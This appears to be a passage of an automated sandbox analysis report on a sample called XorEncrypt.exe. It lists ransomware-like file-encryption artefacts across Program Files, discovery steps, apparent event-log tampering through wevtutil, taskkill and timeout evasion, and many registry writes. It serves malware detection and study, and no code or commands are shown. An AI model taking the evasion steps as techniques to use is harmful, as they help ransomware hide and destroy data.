File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\System.Windows.Forms.Primitives.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10.mp4.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adobe_logo.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\index.win32.stats.json.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Resources.Reader.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\7-Zip\Lang\ne.txt.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\legal\javafx\webkit.md.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ul-oob.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.Misc.v8.1.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Calendars.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-ppd.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.tree.dat.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-pl.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ul-phn.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\System.Windows.Forms.Design.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr\Microsoft.VisualBasic.Forms.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A

Browser Information Discovery

discovery

System Time Discovery

discovery
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\MSTTSLocdeDE.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR de-DE Locale Handler" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "11.0.2013.1022" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - German (Germany)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "C0A" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{A79020BC-1F7E-4D20-AC2A-51D73012DDD5}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "You have selected %1 as the default voice." C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR it-IT Lts Lexicon" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\ = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\VoiceActivation_HW_de-DE.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Paul" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "È stata selezionata la voce predefinita %1." C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\ = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Female" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Julie - French (France)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; computer=NativeSupported; address=NativeSupported; currency=NativeSupported; message=NativeSupported; media=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_HW_es-ES.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\r1040sr.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{0B3398EA-00F1-418b-AA31-6F2F9BE5809B}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{06405088-BC01-4E08-B392-5303E75090C8}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\sidubm.table" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR de-DE Lookup Lexicon" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\tn1033.bin" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - fr-FR Embedded DNN v11.1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense - French (France)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "既定の音声として%1を選びました" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
